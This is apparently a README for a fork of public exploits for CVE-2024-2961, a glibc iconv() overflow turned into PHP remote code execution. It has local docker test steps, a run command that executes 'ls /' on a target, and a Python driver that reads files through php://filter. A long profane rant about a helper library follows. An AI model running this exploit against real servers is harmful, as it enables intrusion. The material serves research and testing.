Exploits for CNEXT (CVE-2024-2961), a buffer overflow in the glibc's iconv(), by @cfreal_
- support nixos
- add test environment
- remove the disgusting
tenpython dependency
- Enter
nix developand open a php environment in thetest_envusingdocker run --name php --net host -v $(pwd):/var/www/html php:7.4-apache(pr replacephp:7.4-apachewith20a3732f422b) - run
python cnext-exploit.py 'http://127.0.0.1:80' 'ls /'and you will see the result.
like this:
from cnext_exploit import Exploit
def test_get_path(url, path: str) -> bytes | None:
print(f"Get path: {path}")
path = f"php://filter/convert.base64-encode/resource={path}"
response = requests.post(url, data={"file": path})
result = re.search("File contents: (.*)", response.text, flags=re.S)
if not result:
return None
data = result.group(1)
return base64.b64decode(data)
def entry(url: str, command: str, sleep: int = 1, heap: str | None = None):
exploit = Exploit(
get_path=lambda path: test_get_path(url, path),
command=command,
sleep=sleep,
heap=heap,
)
exploit.run()It's a useless thin wrapper of things that already exists.
msg_*are just fancierprint- but
msg_statusis different
- but
failuresimply raises an exceptioninformis a decorator that does nothing but print texts, why do we need these many ways to PRINT something?@entry: anotherfire, but use dataclasses- spoiler: then you need to write everything in a f*cking dataclass
tf.random.stringjust join random characters fromrandom.choices(string.ascii_letters + string.digits, k = length)table.split(maps, strip=True)is justmaps.split('\n')and ignore empty strings.Path.write: justpathlib.Path.write_bytes(maybe combined withpathlib.Path.write_text?), what about just use the default one? you know what you want write right?logger: renaminglogging.getLogger, WHY?logging.getLoggeralready exists for YEARS! WHY DO YOU WANT TO RENAME IT JUST FOR MAKING IT LOOKS FANCY???base64.decode: just builtinbase64.b64decode, YET ANOTHER RENAMING???base64.encode: just builtinbase64.b64encodewith other steps, it CHECKS PADDING AND RETURN STRING- when you want to check padding, you JUST USE
endswith!!!!! - and this
base64package has the same name as the builtin one in python
- when you want to check padding, you JUST USE
- and finally the
response.re.searchis justre.search(..., response.text), why don't you guys want to be normal?
I remove this disgusting thin wrapper in my life, and choose solid things like builtin library and great libraries like fire. It makes my life much easier.
PS: it use from ten import * to import itself just like pwntools, which is definitely disgusting too. The pwntools is for interactive python shell and you guys are using it for writing scripts. I really feel sick about it.
The vulnerability and exploits are described in the following blogposts:
- Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 1): PHP filters
- Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 2): direct
iconv()calls, Roundcube - To be continued...
Exploits will become available as blogposts come out.